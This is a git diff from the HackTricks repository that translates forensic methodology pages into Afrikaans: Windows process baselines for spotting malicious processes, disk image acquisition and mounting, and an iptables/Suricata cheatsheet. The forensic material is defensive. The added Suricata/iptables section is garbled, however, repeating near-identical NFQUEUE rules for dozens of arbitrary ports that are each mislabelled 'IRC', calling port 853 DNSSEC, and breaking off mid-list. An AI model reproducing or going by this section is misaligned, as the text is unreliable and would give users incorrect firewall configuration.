**Sessiebestuurder**.\
Sessie 0 begin **csrss.exe** en **wininit.exe** (**OS-dienste**) terwyl Sessie 1 **csrss.exe** en **winlogon.exe** (**Gebruiker-sessie**) begin. Jy behoort egter **slegs een proses** van daardie **binêre lêer** sonder kinders in die prosesseboom te sien.
Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring.
Daarbenewens kan sessies anders as 0 en 1 beteken dat RDP-sessies plaasvind.
## csrss.exe
**Client/Server Run Subsystem Process**.\
It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**.
**Kliënt/Bediener Uitvoeringsondersteuningsproses**.\
Dit bestuur **prosesse** en **drade**, maak die **Windows API** beskikbaar vir ander prosesse en **koppel stuurprogramme aan**, skep **tydelike lêers**, en hanteer die **afsluitingsproses**.
There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**.
Daar is een wat in Sessie 0 loop en nog een in Sessie 1 (dus **2 prosesse** in die prosesseboom). Nog een word geskep **per nuwe Sessie**.
## winlogon.exe
**Windows Logon Process**.\
It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them.
**Windows Aantekenproses**.\
Dit is verantwoordelik vir gebruiker **aanmelding**/**afmelding**. Dit begin **logonui.exe** om vir gebruikersnaam en wagwoord te vra en roep dan **lsass.exe** aan om dit te verifieer.
Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**.
Daarna begin dit **userinit.exe** wat gespesifiseer word in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** met die sleutel **Userinit**.
Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**.
Daarbenewens moet die vorige register **explorer.exe** in die **Shell-sleutel** hê, anders kan dit misbruik word as 'n **kwaadwillige volhardingsmetode**.
## wininit.exe
**Windows Initialization Process**. \
It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process.
**Windows Inisialisasieproses**. \
Dit begin **services.exe**, **lsass.exe**, en **lsm.exe** in Sessie 0. Daar behoort slegs 1 proses te wees.
## userinit.exe
**Userinit Logon Application**.\
Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**.
**Userinit Aanmeldingsprogram**.\
Laai die **ntuser.dat in HKCU** en inisialiseer die **gebruikersomgewing** en voer **aanmeldingskripte** en **GPO** uit.
It launches **explorer.exe**.
Dit begin **explorer.exe**.
## lsm.exe
**Local Session Manager**.\
It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc.
**Plaaslike Sessiebestuurder**.\
Dit werk saam met smss.exe om gebruikersessies te manipuleer: Aanmelding/afmelding, skerm begin, skerm sluit/ontsluit, ens.
After W7 lsm.exe was transformed into a service (lsm.dll).
Na W7 is lsm.exe omskep in 'n diens (lsm.dll).
There should only be 1 process in W7 and from them a service running the DLL.
Daar behoort slegs 1 proses in W7 te wees en daarvandaan 'n diens wat die DLL uitvoer.
## services.exe
**Service Control Manager**.\
It **loads** **services** configured as **auto-start** and **drivers**.
**Diensbeheerder**.\
Dit **laai** **dienste** wat as **outomatiese aanvang** en **bestuurders** gekonfigureer is.
It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more.
Dit is die ouerproses van **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** en nog baie meer.
Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe.
Dienste word gedefinieer in `HKLM\SYSTEM\CurrentControlSet\Services` en hierdie proses onderhou 'n databasis in die geheue van diensinligting wat deur sc.exe ondervra kan word.
Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**.
Let daarop hoe **sommige** **dienste** in 'n **eie proses** sal loop en ander sal 'n **svchost.exe-proses deel**.
There should only be 1 process.
Daar behoort slegs 1 proses te wees.
## lsass.exe
**Local Security Authority Subsystem**.\
It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`.
**Plaaslike Sekuriteitsowerheidsondersteuning**.\
Dit is verantwoordelik vir die gebruiker se **verifikasie** en skep die **sekuriteitstokens**. Dit gebruik verifikasiepakkette wat in `HKLM\System\CurrentControlSet\Control\Lsa` geleë is.
It writes to the **Security** **event** **log** and there should only be 1 process.
Dit skryf na die **Sekuriteit-gebeurtenislogboek** en daar behoort slegs 1 proses te wees.
Keep in mind that this process is highly attacked to dump passwords.
Hou in gedagte dat hierdie proses hoogs aangeval word om wagwoorde te dump.
## svchost.exe
**Generic Service Host Process**.\
It hosts multiple DLL services in one shared process.
**Generiese Diensgasheerproses**.\
Dit bied onderdak aan verskeie DLL-dienste in een gedeelde proses.
Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process.
Gewoonlik sal jy vind dat **svchost.exe** met die `-k` vlag geloods word. Dit sal 'n navraag na die register **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** loods waar daar 'n sleutel met die genoemde argument sal wees wat die dienste bevat wat in dieselfde proses geloods moet word.
For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
Byvoorbeeld: `-k UnistackSvcGroup` sal loods: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument.
As die **vlag `-s`** ook saam met 'n argument gebruik word, word svchost gevra om **slegs die gespesifiseerde diens** in hierdie argument te loods.
There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious.
Daar sal verskeie prosesse van `svchost.exe` wees. As een van hulle **nie die `-k` vlag gebruik nie**, is dit baie verdag. As jy vind dat **services.exe nie die ouerproses is nie**, is dit ook baie verdag.
## taskhost.exe
This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs.
Hierdie proses tree op as 'n gasheer vir prosesse wat van DLL's loop. Dit laai ook die dienste wat van DLL's loop.
In W8 this is called taskhostex.exe and in W10 taskhostw.exe.
In W8 word dit taskhostex.exe genoem en in W10 taskhostw.exe.
## explorer.exe
This is the process responsible for the **user's desktop** and launching files via file extensions.
Hierdie is die proses wat verantwoordelik is vir die **gebruiker se lessenaar** en die loods van lêers via lêeruitbreidings.
**Only 1** process should be spawned **per logged on user.**
**Slegs 1** proses behoort **per aangemelde gebruiker** gegenereer te word.
This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
Dit word uitgevoer vanaf **userinit.exe** wat beëindig moet word, sodat **geen ouerproses** vir hierdie proses moet verskyn nie.
# Catching Malicious Processes
# Vang kwaadwillige prosesse
* Is it running from the expected path? (No Windows binaries run from temp location)
* Is it communicating with weird IPs?
* Check digital signatures (Microsoft artifacts should be signed)
* Is it spelled correctly?
* Is running under the expected SID?
* Is the parent process the expected one (if any)?
* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
* Loop dit vanaf die verwagte pad? (Geen Windows-binêre lêers loop vanaf 'n tydelike plek nie)
* Kommunikeer dit met vreemde IP-adresse?
* Kontroleer digitale handtekeninge (Microsoft-artefakte moet onderteken wees)
* Is dit korrek gespel?
* Loop dit onder die verwagte SID?
* Is die ouerproses die verwagte een (indien enige)?
* Is die kinderprosesse die verwagte (geen cmd.exe, wscript.exe, powershell.exe nie)?
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, ky

94
generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
View file

@ -1,46 +1,53 @@
# Image Acquisition & Mount
# Beeldverwerwing & Monteer
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Acquisition
## Verwerwing
### DD
```bash
#This will generate a raw copy of the disk
dd if=/dev/sdb of=disk.img
```
### dcfldd
dcfldd is a command-line tool that is used for creating and hashing disk images. It is an enhanced version of the dd command and provides additional features such as on-the-fly hashing, progress reporting, and error handling.
To use dcfldd, you need to specify the input and output files or devices. You can also specify options such as block size, hash algorithm, and progress reporting interval.
Here is an example command to create a disk image using dcfldd:
```
dcfldd if=/dev/sda of=image.dd bs=4M hash=md5 hashwindow=10M hashlog=image.md5.log statusinterval=1MB
```
In this example, we are creating a disk image from the /dev/sda device and saving it as image.dd. We are using a block size of 4MB and hashing the image using the MD5 algorithm. The hash window is set to 10MB, which means that the hash is calculated for every 10MB of data. The hash log is saved in the image.md5.log file. The status interval is set to 1MB, which means that progress is reported every 1MB.
dcfldd is a powerful tool that can be used for forensic imaging and data acquisition. It is widely used in the field of digital forensics and can help in preserving and analyzing evidence.
```bash
#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
### FTK Imager
You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
Jy kan die FTK imager [**hier aflaai**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
```bash
ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
```
### EWF
You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf).
Jy kan 'n skyfbeeld genereer deur die [**ewf tools**](https://github.com/libyal/libewf) te gebruik.
```bash
ewfacquire /dev/sdb
#Name: evidence
@ -57,52 +64,56 @@ ewfacquire /dev/sdb
#Then use default values
#It will generate the disk image in the current directory
```
## Monteer
## Mount
### Verskeie tipes
### Several types
In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
### Raw
In **Windows** kan jy probeer om die gratis weergawe van Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) te gebruik om **die forensiese beeld te monteer**.
### Rou
```bash
#Get file type
file evidence.img
file evidence.img
evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files)
#Mount it
mount evidence.img /mnt
```
### EWF
EWF (EnCase Evidence File) is a file format used for forensic disk imaging. It is commonly used in digital forensics to create a forensic image of a disk or a partition. The EWF format ensures the integrity and authenticity of the acquired image by storing a cryptographic hash of the data.
To acquire an image using EWF, you can use tools like EnCase, FTK Imager, or ewfacquire. These tools allow you to create a bit-by-bit copy of the disk or partition, including both allocated and unallocated space.
The EWF format has several advantages over other imaging formats. It supports compression, which can reduce the size of the acquired image. It also supports encryption, which can protect the image from unauthorized access. Additionally, EWF files can be easily mounted and accessed using tools like ewfmount.
To mount an EWF file, you can use the ewfmount command followed by the path to the EWF file and the mount point. This will create a virtual disk that contains the contents of the EWF file, allowing you to access and analyze the data within.
Overall, EWF is a reliable and widely used format for acquiring and analyzing disk images in digital forensics. Its support for compression, encryption, and easy mounting makes it a valuable tool for forensic investigators.
```bash
#Get file type
file evidence.E01
file evidence.E01
evidence.E01: EWF/Expert Witness/EnCase image file format
#Transform to raw
mkdir output
ewfmount evidence.E01 output/
file output/ewf1
file output/ewf1
output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files)
#Mount
mount output/ewf1 -o ro,norecovery /mnt
```
### ArsenalImageMounter
It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
Dit is 'n Windows-toepassing om volumes te monteer. Jy kan dit hier aflaai [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
### Errors
* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector:
### Foute
* **`kan nie /dev/loop0 as slegs-lees monteer nie`** in hierdie geval moet jy die vlae **`-o ro,norecovery`** gebruik
* **`verkeerde fs-tipe, slegte opsie, slegte superblock op /dev/loop0, ontbrekende kodebladsy of hulpprogram, of ander fout.`** in hierdie geval het die monteer misluk as gevolg van die verskil in die verskuiwing van die lêersisteem en die skyfbeeld. Jy moet die Sektor-grootte en die Beginsektor vind:
```bash
fdisk -l disk.img
fdisk -l disk.img
Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
@ -113,21 +124,18 @@ Disk identifier: 0x00495395
Device Boot Start End Sectors Size Id Type
disk.img1 2048 208895 206848 101M 1 FAT12
```
Note that sector size is **512** and start is **2048**. Then mount the image like this:
Let daarop dat die sektor grootte **512** is en die beginpunt is **2048**. Monteer dan die prent soos volg:
```bash
mount disk.img /mnt -o ro,offset=$((2048*512))
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

2591
generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
View file

File diff suppressed because it is too large Load diff

453
generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md
View file

@ -1,29 +1,28 @@
# Suricata & Iptables cheatsheet
# Suricata & Iptables spiekbrief
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Iptables
### Chains
### Kettings
In iptables, lists of rules known as chains are processed sequentially. Among these, three primary chains are universally present, with additional ones like NAT being potentially supported depending on the system's capabilities.
In iptables word lys van reëls wat kettings genoem word, sekwensieel verwerk. Daar is drie primêre kettings wat universeel teenwoordig is, met addisionele kettings soos NAT wat moontlik ondersteun word, afhangende van die vermoëns van die stelsel.
- **Input Chain**: Utilized for managing the behavior of incoming connections.
- **Forward Chain**: Employed for handling incoming connections that are not destined for the local system. This is typical for devices acting as routers, where the data received is meant to be forwarded to another destination. This chain is relevant primarily when the system is involved in routing, NATing, or similar activities.
- **Output Chain**: Dedicated to the regulation of outgoing connections.
These chains ensure the orderly processing of network traffic, allowing for the specification of detailed rules governing the flow of data into, through, and out of a system.
- **Input-ketting**: Word gebruik om die gedrag van inkomende verbindinge te bestuur.
- **Forward-ketting**: Word gebruik om inkomende verbindinge te hanteer wat nie bedoel is vir die plaaslike stelsel nie. Dit is tipies vir toestelle wat as roetingswerk optree, waar die ontvangste data bedoel is om na 'n ander bestemming gestuur te word. Hierdie ketting is hoofsaaklik relevant wanneer die stelsel betrokke is by roetering, NATing of soortgelyke aktiwiteite.
- **Output-ketting**: Word toegewy aan die regulering van uitgaande verbindinge.
Hierdie kettings verseker die ordelike verwerking van netwerkverkeer, wat die spesifikasie van gedetailleerde reëls moontlik maak wat die vloei van data in, deur en uit 'n stelsel beheer.
```bash
# Delete all rules
iptables -F
@ -60,11 +59,324 @@ iptables-save > /etc/sysconfig/iptables
ip6tables-save > /etc/sysconfig/ip6tables
iptables-restore < /etc/sysconfig/iptables
```
## Suricata
### Install & Config
### Installeer & Konfigurasie
```bash
# Installeer Suricata
sudo apt-get install suricata
# Skep 'n nuwe konfigurasie lêer
sudo cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak
# Pas die konfigurasie lêer aan
sudo nano /etc/suricata/suricata.yaml
# Stel die volgende waardes in:
- HOME_NET: jou_netwerk
- EXTERNAL_NET: enige
- RULES_DIR: /etc/suricata/rules
- LOG_DIR: /var/log/suricata/
# Stoor die veranderinge en sluit die lêer
# Skep 'n nuwe reëls gids
sudo mkdir /etc/suricata/rules
# Skep 'n nuwe reëls lêer
sudo touch /etc/suricata/rules/local.rules
# Herlaai Suricata se konfigurasie
sudo suricata-update enable-source oisf/trafficid
sudo suricata-update update-sources
sudo suricata-update
# Begin Suricata
sudo suricata -c /etc/suricata/suricata.yaml -i jou_interface
```
### Iptables
```bash
# Skep 'n nuwe iptables reël
sudo iptables -A OUTPUT -p tcp --dport 80 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir HTTPS
sudo iptables -A OUTPUT -p tcp --dport 443 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir DNS
sudo iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir ICMP
sudo iptables -A OUTPUT -p icmp -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir SSH
sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir RDP
sudo iptables -A OUTPUT -p tcp --dport 3389 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir FTP
sudo iptables -A OUTPUT -p tcp --dport 21 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir Telnet
sudo iptables -A OUTPUT -p tcp --dport 23 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir SMTP
sudo iptables -A OUTPUT -p tcp --dport 25 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir POP3
sudo iptables -A OUTPUT -p tcp --dport 110 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IMAP
sudo iptables -A OUTPUT -p tcp --dport 143 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir SNMP
sudo iptables -A OUTPUT -p udp --dport 161 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir NTP
sudo iptables -A OUTPUT -p udp --dport 123 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir MySQL
sudo iptables -A OUTPUT -p tcp --dport 3306 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir PostgreSQL
sudo iptables -A OUTPUT -p tcp --dport 5432 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir MSSQL
sudo iptables -A OUTPUT -p tcp --dport 1433 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir Oracle
sudo iptables -A OUTPUT -p tcp --dport 1521 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir VNC
sudo iptables -A OUTPUT -p tcp --dport 5900 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir SMB
sudo iptables -A OUTPUT -p tcp --dport 445 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir LDAP
sudo iptables -A OUTPUT -p tcp --dport 389 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir FTPS
sudo iptables -A OUTPUT -p tcp --dport 990 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir SFTP
sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 6667 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir Rsync
sudo iptables -A OUTPUT -p tcp --dport 873 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir DNSSEC
sudo iptables -A OUTPUT -p tcp --dport 853 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir DHCP
sudo iptables -A OUTPUT -p udp --dport 67:68 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 194 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 6660:6669 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 7000 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 8000 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9000 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9001 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9009 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9010 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9020 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9030 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9040 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9050 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9060 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9070 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9080 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9090 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9100 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9110 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
